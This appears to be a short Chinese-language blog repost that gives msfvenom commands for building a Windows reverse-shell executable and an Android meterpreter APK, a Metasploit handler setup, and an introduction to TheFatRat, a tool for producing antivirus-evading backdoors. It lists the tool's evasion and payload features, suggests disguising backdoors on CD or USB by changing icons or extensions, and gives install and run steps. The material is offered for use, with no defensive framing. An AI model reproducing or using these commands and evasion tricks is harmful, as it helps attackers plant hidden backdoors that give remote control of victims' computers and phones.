msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exe
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.168.111 LPORT=3333 R>a.apk
打開msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverset_tcp
-===========================================
TheFatRat:Msfvenom免殺后門生成工具
項目主頁
https://github.com/screetsec/thefatrat
本工具能使用msfvenom生成后門,程序能夠用meterpreter reverse_tcp payload編譯C語言程序,並能夠繞過殺軟。
自動化metasploit功能
-
檢查metasploit服務是否啟動
-
建造Windows, Linux, Android 和Mac的meterpreter reverse_tcp payload
-
開啟多個meterpreter reverse_tcp監聽
-
searchsploit快速搜索
-
免殺
-
進入Msfconsole
自動運行后門
目標如果沒有開啟UAC,你就可以這些文件復制到CD或USB。修改圖標或者后綴
安裝要求
-
linux操作系統,推薦Kali Linux 2或Kali 2016.1 rolling / Cyborg / Parrot /
Dracos / BackTrack / Backbox等
-
metasploit框架
-
gcc, i586-mingw32msvc-gcc或i686-w64-mingw32-gcc ( apt-get install
mingw32 )
開始使用
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatrat
apt-get update
apt-get install mingw32 backdoor-factory
如果提示沒有安裝MinGW或無法找到包

運行
提取lalin-master to your home or another folder
chmod +x fatrat
chmod +x powerfull.sh
./fatrat
然后根據選項輸入相應數字
使用截圖




查毒

文章出處:MottoIN
